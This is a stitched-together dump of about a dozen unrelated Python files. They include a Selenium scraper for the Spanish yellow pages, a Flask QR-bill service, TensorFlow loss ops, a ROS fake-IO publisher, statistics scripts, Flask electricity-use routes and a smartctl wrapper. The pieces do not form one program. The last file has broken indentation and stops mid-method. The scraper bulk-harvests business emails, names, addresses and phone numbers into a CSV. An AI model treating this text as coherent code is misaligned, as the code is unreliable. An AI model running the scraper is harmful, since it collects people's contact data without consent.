from bs4 import BeautifulSoup # pip install beautifulsoup4
import urllib.request
from urllib.error import HTTPError
from urllib.error import URLError
from datetime import datetime
from socket import timeout
from requests.exceptions import ConnectionError
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import json, errno, os, time, glob, sys, codecs
# ------------------------------------------ LINK LETRAS ------------------------------------------
def loadLetras():
    """Load previously collected letter-index URLs from letras.csv into letrasLista."""
    try:
        with open("letras.csv", "r") as fh:
            for row in fh:
                letrasLista.append(row.strip())
    except FileNotFoundError:
        # First run: no saved state yet; keep the original blank-line output.
        print('')
    return
def saveLetras():
    """Write to letras.csv every letter URL not yet processed (not in hecha)."""
    with open('letras.csv', "w") as fh:
        for url in letrasLista:
            if url not in hecha:
                fh.write(url + '\n')
    return
# ------------------------------------------ LINK PAGINAS CATEGORIA ------------------------------------------
def loadPagesLiks():
    """Load previously collected category-page URLs from pageLinks.csv into linkLista."""
    try:
        with open("pageLinks.csv", "r") as fh:
            for row in fh:
                linkLista.append(row.strip())
    except FileNotFoundError:
        # First run: no saved state yet; keep the original blank-line output.
        print('')
    return
def savePagesLiks():
    """Write to pageLinks.csv every category URL not yet processed (not in hechaLinks)."""
    with open('pageLinks.csv', "w") as fh:
        for url in linkLista:
            if url not in hechaLinks:
                fh.write(url + '\n')
    return
# ------------------------------------------ LINK PAGINA INDIVIDUAL ------------------------------------------
def loadPagesLiksIndiv():
    """Load previously collected business-page URLs from pageLinksIndiv.csv into linksNegocios."""
    try:
        with open("pageLinksIndiv.csv", "r") as fh:
            for row in fh:
                linksNegocios.append(row.strip())
    except FileNotFoundError:
        # First run: no saved state yet; keep the original blank-line output.
        print('')
    return
def savePagesLiksIndiv():
    """Write to pageLinksIndiv.csv every business URL not yet scraped (not in paginaEscaneada)."""
    with open('pageLinksIndiv.csv', "w") as fh:
        for url in linksNegocios:
            if url not in paginaEscaneada:
                fh.write(url + '\n')
    return
# ------------------------------------------ CSV FILES ------------------------------------------
def saveResult():
    """Overwrite resultado.csv with every scraped CSV row collected so far."""
    with open('resultado.csv', "w") as fh:
        for row in resultado:
            fh.write(row + '\n')
    return
def loadStep():
    """Read the scraping progress flags from step.csv.

    Returns the parsed JSON dict; when the file is missing, prints 'Error'
    and returns the all-false default configuration.
    """
    try:
        with open('step.csv', "r") as fh:
            blob = ''.join(row.strip() for row in fh)
        return json.loads(blob)
    except FileNotFoundError:
        print('Error')
        return json.loads('{ "letrasDONE":"false", "paginaletrasDONE":"false", "paginasnegociosDONE":"false" }')
def saveStep():
    """Persist the global jsonConfig progress flags to step.csv."""
    with open('step.csv', "w") as fh:
        fh.write(json.dumps(jsonConfig))
    return
def descargarPaginasLetra():
    """Collect the A-Z letter-index URLs from the site into letrasLista.

    NOTE(review): opens its own Firefox instance and duplicates
    descargarPaginasInicial(); only descargarPaginasInicial is called from the
    main script, so this function appears superseded.
    """
    browser = webdriver.Firefox()
    browser.get('https://www.paginasamarillas.es/');
    contenido = browser.find_element_by_css_selector('li.l-floatleft:nth-child(2) > a:nth-child(1)').click(); # Pagina principal
    letras = browser.find_element_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul');
    letras = letras.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul/li');
    for aa in letras:
        aa = aa.find_element_by_xpath('a');
        letrasLista.append(aa.get_attribute("href"));
    return
def descargarPaginasInicial(browser):
    """Collect the A-Z letter-index URLs from the site into letrasLista,
    reusing the caller-supplied Selenium ``browser``."""
    browser.get('https://www.paginasamarillas.es/');
    contenido = browser.find_element_by_css_selector('li.l-floatleft:nth-child(2) > a:nth-child(1)').click(); # Pagina principal
    letras = browser.find_element_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul');
    letras = letras.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul/li');
    for aa in letras:
        aa = aa.find_element_by_xpath('a');
        letrasLista.append(aa.get_attribute("href"));
    return
def descargarPaginasLetras(link, browser):
    """Scrape one letter page, add unseen category URLs to linkLista, and
    return the scraped row elements (their count drives pagination)."""
    browser.get(link);
    activ = browser.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[3]/ul/li'); # Pagina principal
    for bb in activ:
        bb = bb.find_element_by_xpath('a');
        linkpagees = bb.get_attribute("href");
        if linkpagees not in linkLista:
            linkLista.append(linkpagees);
    return activ;
def descargarPaginasEspecifica(link, browser):
    """Walk a category's result pages and scrape every unseen business page.

    Requests successive pages (link + page number) while a page yields more
    than 14 result rows; each new business URL is recorded in linksNegocios
    and immediately scraped with descargarResultado().
    """
    pagina=1;
    browser.get(link);
    negocios = browser.find_elements_by_xpath('/html/body/div[1]/div[1]/section[1]/ul/li');
    htmls = [];
    for ne in negocios:
        # Extract the business-detail link out of each result row's HTML.
        html = ne.get_attribute('innerHTML')
        html = BeautifulSoup(html, 'html.parser');
        html = html.find_all(class_='m-results-business--name')[0].find_all('a')[0]['href'];
        if html not in linksNegocios:
            htmls.append(html);
            linksNegocios.append(html);
    for lii in htmls:
        descargarResultado(lii,browser);
    # More than 14 rows means another result page may follow.
    while (len(negocios)>14):
        browser.get(link + str(pagina));
        negocios = browser.find_elements_by_xpath('/html/body/div[1]/div[1]/section[1]/ul/li');
        htmls = [];
        for ne in negocios:
            html = ne.get_attribute('innerHTML')
            html = BeautifulSoup(html, 'html.parser');
            try:
                html = html.find_all(class_='m-results-business--name')[0].find_all('a')[0]['href'];
                if html not in linksNegocios:
                    htmls.append(html);
                    linksNegocios.append(html);
            except :
                # Rows without a business-name anchor are skipped.
                html = ''
        for lii in htmls:
            descargarResultado(lii,browser);
        pagina=pagina +1;
    return;
def descargarResultado(link, browser):
    """Scrape one business page and append 'email,name,address,phone,activity'
    to ``resultado``, persisting the whole result file after each row.

    The business record is embedded in the page as a JSON blob inside the
    ``data-business`` attribute; it is cut out of the raw page source and
    decoded.
    """
    browser.get(link)
    valor = browser.page_source.split('data-business=')[1].split('data-power')[0]
    # The attribute value is HTML-escaped; turn &quot; entities back into
    # quotes. (The original replace() line was mangled by an encoding
    # round-trip -- TODO confirm against a live page.)
    valor = valor.replace('&quot;', '"')
    # Strip the opening attribute quote and the trailing '" ' after the JSON.
    valor = valor.replace("\"", '', 1) + 'FINNN'
    valor = valor.replace('}}\" FINNN', '}}')
    d = json.loads(valor)
    # Missing keys simply become empty fields (was a try/except per field).
    info = d.get("info", {})
    email = d.get("customerMail", '')
    name = info.get("name", '')
    businessAddress = info.get("businessAddress", '').replace(",", ";")
    phone = info.get("phone", '')
    activity = info.get("activity", '')
    tupla = email + ',' + name + ',' + businessAddress + ',' + phone + ',' + activity
    resultado.append(tupla)
    saveResult()
#
#
# ********************************** Programa principal **********************************
#
#
# ---- shared scraper state ----
# NOTE(review): indentation of this script was reconstructed -- confirm
# against the original file.
letrasLista =[];        # letter-index URLs (A-Z pages)
linkLista =[];          # category pages discovered per letter
hecha =[];              # letters already fully processed
hechaLinks=[];          # category pages already fully processed
linksNegocios=[];       # individual business page URLs
paginaEscaneada = [];   # business pages already scraped
resultado = [];         # CSV rows: email,name,address,phone,activity
iterar = 0;             # unused
archi = 0;              # unused
browser = webdriver.Firefox()
# Resume from the persisted step/URL files, if any.
jsonConfig = loadStep();
loadLetras();
loadPagesLiks();
print(jsonConfig);
# Stage 1: collect the A-Z letter pages.
if (jsonConfig["letrasDONE"] != 'true' ):
    descargarPaginasInicial(browser);
    jsonConfig["letrasDONE"]= 'true';
    saveStep();
# Stage 2: walk each letter's paginated category listings.
if (jsonConfig["paginaletrasDONE"] != 'true' ):
    for aa in letrasLista:
        browser.get(aa);
        activ = browser.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[3]/ul/li'); # Pagina principal
        pagina=1;
        # More than 14 rows means another result page may follow.
        while (len(activ)>14):
            activ = descargarPaginasLetras( aa.replace("_1","_"+str(pagina)),browser );
            savePagesLiks();
            pagina=pagina +1;
        hecha.append(aa);
        saveLetras();
    jsonConfig["paginaletrasDONE"]= 'true';
    saveStep();
loadPagesLiksIndiv();
# Stage 3: scrape every business page of every category.
if (jsonConfig["paginasnegociosDONE"] != 'true' ):
    for bb in linkLista:
        descargarPaginasEspecifica(bb, browser);
        savePagesLiksIndiv();
        hechaLinks.append(bb);
        savePagesLiks();
    jsonConfig["paginasnegociosDONE"]= 'true';
    saveStep();
|
from flask import Flask, request, send_file
from qrbill.bill import QRBill
from io import BytesIO, StringIO
app = Flask(__name__)


@app.route('/')
def main():
    """Build a Swiss QR-bill from query-string parameters and return it as SVG.

    Every bill field is taken verbatim from request.args (missing parameters
    become None); on invalid input the QRBill constructor's ValueError message
    is returned as the response body instead of an image.
    """
    try:
        payment_parts = QRBill(
            account=request.args.get('account'),
            amount=request.args.get('amount'),
            currency=request.args.get('currency'),
            due_date=request.args.get('due-date'),
            creditor={
                'name': request.args.get('creditor-name'),
                'line1': request.args.get('creditor-line1'),
                'line2': request.args.get('creditor-line2'),
                'street': request.args.get('creditor-street'),
                'house_num': request.args.get('creditor-house-num'),
                'pcode': request.args.get('creditor-pcode'),
                'city': request.args.get('creditor-city'),
                'country': request.args.get('creditor-country')
            },
            debtor={
                'name': request.args.get('debtor-name'),
                'line1': request.args.get('debtor-line1'),
                'line2': request.args.get('debtor-line2'),
                'street': request.args.get('debtor-street'),
                'house_num': request.args.get('debtor-house_num'),
                'pcode': request.args.get('debtor-pcode'),
                'city': request.args.get('debtor-city'),
                'country': request.args.get('debtor-country')
            },
            ref_number=request.args.get('ref-number'),
            extra_infos=request.args.get('extra-infos'),
            alt_procs=request.args.get('alt-procs', '').split(','),
            language=request.args.get('language'),
            top_line=request.args.get('top_line'),
            payment_line=request.args.get('payment_line')
        )
        # Render to SVG text, then re-wrap as UTF-8 bytes for send_file.
        response = StringIO()
        payment_parts.as_svg(response)
        return send_file(
            BytesIO(response.getvalue().encode('utf-8')),
            mimetype='image/svg+xml'
        )
    except ValueError as e:
        return str(e)
|
# coding:utf-8
import xadmin
from .models import Experiment
class ExperimentAdmin(object):
    """xadmin configuration for the Experiment model."""
    # Columns shown in the change list.
    list_display = ['name', 'degree','images','port','category', 'students',]
    search_fields = ['name', 'degree', 'category']
    list_filter = ['degree', 'category','click_nums', 'fav_nums', 'students','add_time']
    # Most-clicked experiments first.
    ordering = ['-click_nums']
    # Counters maintained by the application, not edited by hand.
    readonly_fields = ['click_nums', 'fav_nums', 'students']


xadmin.site.register(Experiment,ExperimentAdmin)
#!/usr/bin/env python
"""
File: ops
Date: 11/21/18
Author: Jon Deaton (jdeaton@stanford.edu)
"""
import tensorflow as tf
def f1(y_true, y_pred):
    """Macro-averaged F1 score (TF1-style graph op).

    Confusion counts are summed over axis 0 and F1 is averaged over the
    remaining axis -- assumes inputs are (batch, n_labels); TODO confirm.
    Labels with no positives would yield NaN and are counted as 0.
    Removed: the true-negative count, which was computed but never used.
    """
    with tf.variable_scope("macro-f1-score"):
        y_pred = tf.cast(y_pred, tf.float32)
        # Per-label confusion counts, summed over the batch axis.
        tp = tf.reduce_sum(y_true * y_pred, axis=0)
        fp = tf.reduce_sum((1 - y_true) * y_pred, axis=0)
        fn = tf.reduce_sum(y_true * (1 - y_pred), axis=0)
        # epsilon guards against 0/0 when a label never occurs.
        p = tp / (tp + fp + tf.keras.backend.epsilon())
        r = tp / (tp + fn + tf.keras.backend.epsilon())
        f1 = 2 * p * r / (p + r + tf.keras.backend.epsilon())
        f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)
        return tf.reduce_mean(f1)
def f1_cost(y_prob, y_true):
    """Macro-F1 based loss: 1 - mean per-label F1, computed from probabilities.

    Mirrors f1() but without thresholding the predictions. Note the argument
    order (y_prob, y_true) is the reverse of f1(y_true, y_pred); kept as-is
    for caller compatibility.
    Removed: the true-negative count, which was computed but never used.
    """
    with tf.variable_scope("macro-f1-loss"):
        # Soft per-label confusion counts, summed over the batch axis.
        tp = tf.reduce_sum(y_true * y_prob, axis=0)
        fp = tf.reduce_sum((1 - y_true) * y_prob, axis=0)
        fn = tf.reduce_sum(y_true * (1 - y_prob), axis=0)
        p = tp / (tp + fp + tf.keras.backend.epsilon())
        r = tp / (tp + fn + tf.keras.backend.epsilon())
        f1 = 2 * p * r / (p + r + tf.keras.backend.epsilon())
        # Labels with no positives yield NaN; count them as 0.
        f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)
        return 1 - tf.reduce_mean(f1)
def inception_module(input, filters, kernels):
    """Apply a stack of ConvReLu layers and concatenate their outputs on axis 1.

    NOTE(review): ``l`` is re-assigned each iteration, so every conv is applied
    to the PREVIOUS conv's output and the concat gathers a chain of deepening
    features. A classic Inception block applies each kernel to ``input``
    directly (parallel branches) -- confirm the chaining is intentional.
    """
    with tf.variable_scope("Inception"):
        l = input
        convs = list()
        for kernel in kernels:
            l = ConvReLu(l, filters, kernel)
            convs.append(l)
        return tf.concat(values=convs, axis=1, name="concat")
def ConvReLu(input, filters, kernel):
    """2-D convolution (channels-first, 'same' padding, stride 1) followed by ReLU."""
    # with tf.variable_scope("ConvReLu"):
    # Small-stddev truncated-normal weights, zero biases.
    kernel_initializer = tf.truncated_normal_initializer(stddev=5e-2, dtype=tf.float32)
    bias_initializer = tf.zeros_initializer(dtype=tf.float32)
    l = tf.layers.conv2d(input,
                         filters=filters, kernel_size=kernel, strides=(1, 1), padding='same',
                         data_format='channels_first', activation=None, use_bias=True,
                         kernel_initializer=kernel_initializer, bias_initializer=bias_initializer)
    return tf.nn.relu(l)
def MaxPooling2D(x):
    """2x2 max-pooling with stride 2 (channels-first layout)."""
    return tf.layers.max_pooling2d(x, pool_size=(2, 2), strides=2, data_format='channels_first')
|
#!/usr/bin/python
#\file send_fake_io1.py
#\brief Sending a fake IO states (digital in).
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Apr.20, 2021
import roslib
import rospy
import std_msgs.msg
import std_srvs.srv
#roslib.load_manifest('ur_dashboard_msgs')
#import ur_dashboard_msgs.msg
roslib.load_manifest('ur_msgs')
import ur_msgs.msg
def SendFakeDigitalInDignal(signal_idx, signal_trg):
    """Publish one fake IOStates message with digital input ``signal_idx`` set to ``signal_trg``.

    All other pins/flags/analog channels are filled with False / zero defaults.
    (The name keeps the original "Dignal" typo for caller compatibility.)
    """
    pub_io_states= rospy.Publisher('/ur_hardware_interface/io_states', ur_msgs.msg.IOStates, queue_size=10)
    # Short pause before the single publish, presumably to let subscribers
    # connect -- TODO confirm.
    rospy.sleep(0.2)
    msg= ur_msgs.msg.IOStates()
    msg.digital_in_states= [ur_msgs.msg.Digital(pin,False) for pin in range(18)]
    msg.digital_out_states= [ur_msgs.msg.Digital(pin,False) for pin in range(18)]
    msg.flag_states= [ur_msgs.msg.Digital(pin,False) for pin in range(2)]
    msg.analog_in_states= [ur_msgs.msg.Analog(pin,0,0) for pin in range(2)]
    msg.analog_out_states= [ur_msgs.msg.Analog(pin,0,0) for pin in range(2)]
    # Override the one pin being faked.
    msg.digital_in_states[signal_idx]= ur_msgs.msg.Digital(signal_idx,signal_trg)
    #print 'msg='
    #print msg
    pub_io_states.publish(msg)
#pub_digital= rospy.Publisher('/ur_hardware_interface/io_states', ur_msgs.msg.Digital, queue_size=10)
#msg= ur_msgs.msg.Digital(2,True)
#print 'msg='
#print msg
#pub_digital.publish(msg)
if __name__=='__main__':
    rospy.init_node('send_fake_io1')
    # Fake: digital input pin 3 goes high once.
    SendFakeDigitalInDignal(3, True)
    #rate= rospy.Rate(10)
    #for i in range(3):
    #SendFakeDigitalInDignal(3, True)
    #print '=============',i,'============='
    #rate.sleep()
    ##rospy.spin()
|
from constants import *
import numpy as np
from sympy.solvers import solve
from sympy import Symbol
from scipy.signal import correlate
# takes multiple audio feeds (for the same sound) of the form
# (position, numpyarray)
# and calculates the approximate position of the sound
# takes multiple audio feeds (for the same sound) of the form
# (position, numpyarray)
# and calculates the approximate position of the sound
def localize(mics):
    """Compute pairwise distance differences between all microphone pairs.

    NOTE(review): ``corr_distance`` is discarded each iteration and nothing is
    returned -- the triangulation step appears unimplemented.
    """
    for index1, mic1 in enumerate(mics):
        for index2, mic2 in enumerate(mics):
            if index1 != index2:
                # find the most likely distance difference (highest cross-correlation peak)
                position1, audio1 = mic1
                position2, audio2 = mic2
                corr_distance = find_distance(position1, audio1, position2, audio2)
def find_distance(position1, audio1, position2, audio2):
    """Return the difference in source distances (metres) between the two mics,
    estimated from the cross-correlation peak of their audio feeds.

    Uses the module-level `sampling_rate` and `speed_of_sound` constants.
    `position1`/`position2` are currently unused but kept for interface
    compatibility with localize().
    """
    # BUG FIX: the module imports `correlate` directly
    # (`from scipy.signal import correlate`); the original call
    # `scipy.signal.correlate(...)` raised NameError because `scipy` itself
    # is never imported.
    correlation = correlate(audio1, audio2)
    # BUG FIX: in 'full' mode the zero-lag peak sits at index len(audio2)-1,
    # so the argmax index must be shifted to get a signed sample lag.
    lag = np.argmax(correlation) - (len(audio2) - 1)
    max_time = lag / sampling_rate
    return max_time * speed_of_sound
|
#!/usr/bin/env python
def story(**kwds):
    """Return a one-line story filled in from the `job` and `name` keywords.

    BUG FIX: the implicitly concatenated string literals were missing a space
    between "a" and the job ("...there was aking called Gummy.").
    """
    return 'Once upon a time, there was a ' \
           '%(job)s called %(name)s.' % kwds
# Demonstrations of keyword-argument passing into story().
# NOTE(review): the return values below are discarded -- presumably these
# lines were meant to be printed.
story(job='king',name='Gummy')
params={'job':'language','name':'Python'}
story(**params)
del params['job']
# Mix an explicit keyword with the remaining entries of the dict.
story(job='stroke of genius',**params)
##############################################
def power(x,y,*others):
    """Return x**y; any extra positional arguments are reported and ignored."""
    if others:
        print 'Received redundant parameters:', others
    return pow(x,y)
# Demonstrations: positional, keyword and unpacked-tuple argument passing.
print power(3,2)
print power(y=3,x=2)
params=(5,) * 2
print power(*params)
# The extra 'Hello,World' argument lands in *others and is only reported.
print power(3,3,'Hello,World')
|
import re
import json
class GenericFormatter(object):
    """Round-trips integer sequences between raw text and a JSON encoding."""

    NAME = "Generic"

    @staticmethod
    def decode(raw):
        """Extract every run of digits from `raw` and return a JSON int list.

        BUG FIX: `map()` returns a lazy iterator on Python 3, which
        json.dumps cannot serialize -- it must be materialized into a list.
        """
        pattern = re.compile(r"\d+")
        result = list(map(int, re.findall(pattern, raw)))
        return json.dumps(result)

    @staticmethod
    def representation(encoded):
        """Render all but the last decoded value as a dash-separated string.

        BUG FIX: json.loads yields ints and str.join requires strings, so the
        values must be converted with str() (the original raised TypeError).
        """
        values = json.loads(encoded)
        return "-".join(str(v) for v in values[:-1])
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys,math,os,random
__all__ = []
__all__.append("parse_and_apply")
def parse_and_apply(arguments):
    """Parse "<dir> <file> <y_min> <bootstrap>" from one whitespace-separated
    string and run main() on the resulting file path."""
    directori,filename,y_min,bootstrap = arguments.split()
    filename = os.path.join(directori, filename)
    print >> sys.stderr, "calling main for", filename
    y_min = float(y_min)
    # NOTE(review): main() is defined as main(filename, bootstrap=False, out=None),
    # so y_min is passed into the `bootstrap` slot and `bootstrap` into `out`
    # here -- confirm the intended signature/call.
    main(filename, y_min, bootstrap)
def get_data(filename):
    """Read whitespace-separated rows from `filename` and return column 4
    (1-based) of each line as a list of floats.

    BUG FIX: the original opened the file without ever closing it; a context
    manager guarantees the handle is released.
    """
    with open(filename, 'r') as handle:
        return [float(line.split()[4 - 1]) for line in handle]
def lambda_normalitzacio(xs, x_min):
    """Return (rate, normalisation) for a shifted exponential fit of `xs`.

    The rate is the maximum-likelihood estimate n / sum(x - x_min); the
    normalisation constant is rate / exp(-rate * x_min).
    """
    def ml_rate(values, shift):
        "Maximum-likelihood estimate of the exponential rate."
        total = 0.
        for value in values:
            total = total + (value - shift)
        return float(len(values)) / total

    rate = ml_rate(xs, x_min)
    normalisation = rate / math.exp(-rate * x_min)
    return rate, normalisation
def least_resamplings(xs):
    """Lower bound on bootstrap resamplings for `xs`: n * (log n)**2."""
    sample_size = len(xs)
    log_size = math.log(sample_size)
    return sample_size * log_size * log_size
def resample(xs, length=None):
    """Draw `length` elements from `xs` with replacement (defaults to len(xs))."""
    size = len(xs) if length is None else length
    return [random.choice(xs) for _ in range(size)]
def estadistica(bootstrap_data):
    """Return (mean_exp, sigma_exp, mean_norm, sigma_norm) over the list of
    (exponent, normalisation) bootstrap pairs (population standard deviation)."""
    weight = 1. / float(len(bootstrap_data))
    # First pass: weighted means.
    mean_exp = 0.
    mean_norm = 0.
    for exponent, normalisation in bootstrap_data:
        mean_exp = mean_exp + weight * exponent
        mean_norm = mean_norm + weight * normalisation
    # Second pass: weighted variances around the means.
    var_exp = 0.
    var_norm = 0.
    for exponent, normalisation in bootstrap_data:
        var_exp = var_exp + weight * (exponent - mean_exp) * (exponent - mean_exp)
        var_norm = var_norm + weight * (normalisation - mean_norm) * (normalisation - mean_norm)
    return mean_exp, math.sqrt(var_exp), mean_norm, math.sqrt(var_norm)
__all__.append("main")
def main(filename, bootstrap=False, out=None):
    """Fit a shifted exponential to column 4 of `filename` and, optionally,
    bootstrap the uncertainty of the fitted parameters."""
    bootstrap_data = []
    data = get_data(filename)
    # Zeros are excluded before taking the minimum.
    ys = [dada for dada in data if dada != 0.]
    y_min = min(ys)
    lambda_, normalitzacio = lambda_normalitzacio(ys, y_min)
    print y_min, lambda_, normalitzacio
    # store results
    class Results: pass
    results = Results()
    results.y_min = y_min
    results.lambda_ = lambda_
    results.normalitzacio = normalitzacio
    bootstrap_data.append((lambda_, normalitzacio))
    if not bootstrap: return
    # NOTE(review): the least_resamplings() value is immediately overwritten
    # by len(ys) on the next line -- confirm which count is intended.
    resamplings = least_resamplings(ys)
    resamplings = len(ys)
    for i in range(resamplings):
        resample_ = resample(ys, len(ys))
        # NOTE(review): `lamda_` (typo) receives the resampled estimate, so the
        # unresampled `lambda_` is appended every iteration and the bootstrap
        # spread of the exponent collapses to zero -- almost certainly a bug.
        lamda_, normalitzacio = lambda_normalitzacio(resample_, y_min)
        bootstrap_data.append((lambda_, normalitzacio))
        if out is not None:
            print y_min, lambda_, normalitzacio
        print >> sys.stderr, "bootsraping #%d:%d [y_min: %f]" \
            % (i, resamplings - i, y_min), \
            "a set of %d elements" % len(ys)
    b_lambda_,b_sigma_lambda_,b_norm,b_sigma_norm = estadistica(bootstrap_data)
    print "bootstrap",
    print y_min, b_lambda_,b_sigma_lambda_,b_norm,b_sigma_norm
    results.b_lambda_ = b_lambda_
    results.b_sigma_lambda_ = b_sigma_lambda_
    results.b_norm = b_norm
    results.b_sigma_norm = b_sigma_norm
    r = results
    # Summary table (Catalan labels kept: they are runtime output).
    print
    print "En resum: els resultats de %s" % filename
    print "Magnitud estimacio estimacio_botstrap sigma"
    print "y_min: %f" % r.y_min
    print "lambda_: %f %f %f" % \
        (r.lambda_, r.b_lambda_, r.b_sigma_lambda_)
    print "norm: %f %f %f" % \
        (r.normalitzacio, r.b_norm, r.b_sigma_norm)
    print
if __name__ == "__main__":
    filename_default = "bursts_all.dat"
    try:
        filename = sys.argv[1]
    # BUG FIX: narrowed the bare `except:` -- only a missing CLI argument
    # (IndexError) should fall back to the default file.
    except IndexError:
        filename = filename_default
    main(filename, bootstrap=True)
|
from flask import Flask, render_template, url_for, redirect
from reporter_app.electricity_use import bp
from reporter_app import db
from reporter_app.models import User, ElecUse
import pandas as pd
from reporter_app.electricity_use.utils import call_leccyfunc, get_real_power_usage_for_times
from flask_security import auth_required, roles_required
from datetime import datetime, timedelta
def _electricity_use_page(start_date=None):
    """Render the electricity-use page for ElecUse entries newer than
    `start_date`; with None, every entry is included.

    Shared implementation for all the time-window routes below (the original
    duplicated this body five times).
    """
    query = ElecUse.query
    if start_date is not None:
        query = query.filter(ElecUse.date_time > start_date)
    e_use_entries = query.all()
    labels = [row.date_time for row in e_use_entries]
    power_e_use_data = [row.electricity_use for row in e_use_entries]
    real_power_usage = get_real_power_usage_for_times(labels)
    return render_template('electricity_use/electricity_use.html',
                           data_labels=labels,
                           power_e_use_data=power_e_use_data,
                           real_power_usage=real_power_usage)


@bp.route('/electricity_use')
@auth_required("token", "session")
@roles_required('verified')
def electricity_use():
    """Electricity use over the last 24 hours."""
    return _electricity_use_page(datetime.now() - timedelta(hours=24))


@bp.route('/electricity_use/48_hours')
@auth_required("token", "session")
@roles_required('verified')
def e_use_48h():
    """Electricity use over the last 48 hours."""
    return _electricity_use_page(datetime.now() - timedelta(hours=48))


@bp.route('/electricity_use/7_days')
@auth_required("token", "session")
@roles_required('verified')
def e_use_7d():
    """Electricity use over the last 7 days."""
    return _electricity_use_page(datetime.now() - timedelta(days=7))


@bp.route('/electricity_use/28_days')
@auth_required("token", "session")
@roles_required('verified')
def e_use_28d():
    """Electricity use over the last 28 days."""
    return _electricity_use_page(datetime.now() - timedelta(days=28))


@bp.route('/electricity_use/all')
@auth_required("token", "session")
@roles_required('verified')
def e_use_all():
    """Electricity use over the whole recorded history."""
    return _electricity_use_page()
|
# -*- coding: utf-8 -*-
# Depends: smartctl
from __future__ import print_function
try:
from . import Helper
except:
import Helper
import os
import stat
import re
import sys
class SmartInfo(object):
    """Collect S.M.A.R.T. data for one block device via smartctl's JSON interface."""

    def __init__(self, device):
        """`device` is a bare name such as "sda"; it is expanded to /dev/sda."""
        self.device = None
        self.information = []   # list of (key, value) display pairs
        self.attributes = []    # see getAttributes() for the tuple layout
        self.selftests = []     # list of (type, status) pairs
        self.errors = []        # list of (type, status) pairs
        self.capabilities = {}
        device = "/dev/" + device
        if self.__canUseSmartctl():
            # make sure the target really is a block device
            if self.__isBlockDevice(device):
                self.device = device
            else:
                self.information.append( ("Achtung!", "%s ist keine Festplatte" % (device,)) )

    def __parseInformationSection(self):
        """Parse `smartctl -i` text output into self.information pairs."""
        if self.device:
            cmd = [ "/usr/sbin/smartctl", "-i", self.device ]
            output = Helper.sub_process(cmd)
            inSection = False
            self.information = []
            for line in output.splitlines():
                if inSection:
                    try:
                        key, val = line.split(':', 1)
                        self.information.append( (key.strip(), val.strip()) )
                    except ValueError:
                        # line without a "key: value" shape -- skip it
                        pass
                if line == '=== START OF INFORMATION SECTION ===':
                    inSection = True
            self.__parseCapabilities()

    def __parseAttributesBlock(self):
        """Parse `smartctl -Aj` JSON into self.attributes tuples."""
        if self.device:
            cmd = [ "/usr/sbin/smartctl", "-Aj", self.device ]
            out = Helper.sub_process(cmd)
            attributes = Helper.json_loads(out)
            if attributes:
                table = attributes["ata_smart_attributes"]["table"]
                self.attributes = []
                for attr in table:
                    failed = 'ok'
                    if 'when_failed' in attr and attr['when_failed'] != '':
                        failed = attr["when_failed"]
                    # BUG FIX: the original tested the misspelled key 'tresh'
                    # and then indexed attr with the *value* variable
                    # (attr[thresh]), raising KeyError; smartctl's JSON key
                    # is 'thresh'.
                    thresh = ''
                    if 'thresh' in attr:
                        thresh = str(attr['thresh'])
                    line = ( str(attr['id']), attr['name'].replace("_", " "), failed, str(attr["value"]), str(attr["worst"]), thresh, attr['raw']['string'] )
                    self.attributes.append(line)

    def __parseSelftestsLog(self):
        """Parse `smartctl -jl selftest` JSON into self.selftests."""
        if self.device:
            cmd = [ "/usr/sbin/smartctl", "-jl", "selftest", self.device ]
            out = Helper.sub_process(cmd)
            try:
                selftests = Helper.json_loads(out)
                logged = selftests["ata_smart_self_test_log"]["standard"]["table"]
                for item in logged:
                    self.selftests.append( (item["type"]["string"].encode("ascii"), item["status"]["string"].encode("ascii") ) )
            except Exception:
                # best effort: an empty or malformed log simply yields no entries
                pass

    def __parseErrorLog(self):
        """Parse `smartctl -jl error` JSON into self.errors."""
        if self.device:
            cmd = [ "/usr/sbin/smartctl", "-jl", "error", self.device ]
            out = Helper.sub_process(cmd)
            try:
                errorlog = Helper.json_loads(out)
                logged = errorlog["ata_smart_error_log"]["summary"]["table"]
                for item in logged:
                    # BUG FIX: the original appended error entries to
                    # self.selftests, leaving self.errors permanently empty.
                    # NOTE(review): field names were copied from the self-test
                    # log -- verify against the actual error-log JSON schema.
                    self.errors.append( (item["type"]["string"].encode("ascii"), item["status"]["string"].encode("ascii") ) )
            except Exception:
                pass

    def __parseCapabilities(self):
        """Parse `smartctl -jc` JSON into self.capabilities."""
        if self.device:
            cmd = [ "/usr/sbin/smartctl", "-jc", self.device ]
            out = Helper.sub_process(cmd)
            cap = None
            try:
                cap = Helper.json_loads(out)
                for name, value in cap["ata_smart_data"]["capabilities"].items():
                    self.capabilities[name] = value
            except Exception:
                pass
            try:
                self.capabilities["poll_short_test"] = cap["ata_smart_data"]["self_test"]["polling_minutes"]["short"]
            except Exception:
                # cap may be None or lack the polling entry
                self.capabilities["poll_short_test"] = None

    def __isBlockDevice(self, device):
        """Return True when `device` is a block device node."""
        mode = os.stat(device).st_mode
        return stat.S_ISBLK(mode)

    # Try to make sure that smartctl is installed and recent enough.
    # This plugin uses the JSON interface to avoid parsing effort; if no
    # suitable version is found, this is reported via self.information.
    def __canUseSmartctl(self):
        try:
            cmd = [ "/usr/sbin/smartctl", "-V", ]
            out = Helper.sub_process(cmd)
        except Exception:
            self.information.append( ("Achtung!", '"smartmontools" ist nicht installiert oder defekt.') )
            return False
        match = re.search("smartmontools release (.*?) ", out, re.MULTILINE)
        if match:
            version = match.group(1)
            # BUG FIX: the original compared version strings lexically, so
            # e.g. "10.0" < "7.0" was True; compare numerically instead.
            try:
                too_old = tuple(int(p) for p in version.split(".")[:2]) < (7, 0)
            except ValueError:
                too_old = version < "7.0"
            if too_old:
                self.information.append( ("Achtung!", '"smartmontools" sind zu alt (< 7.0)') )
                return False
        else:
            self.information.append( ("Achtung!", '"smartmontools" Version kann nicht ermittelt werden.') )
            return False
        return True

    def startShortSelftest(self):
        """Kick off a short self-test and invalidate the cached log."""
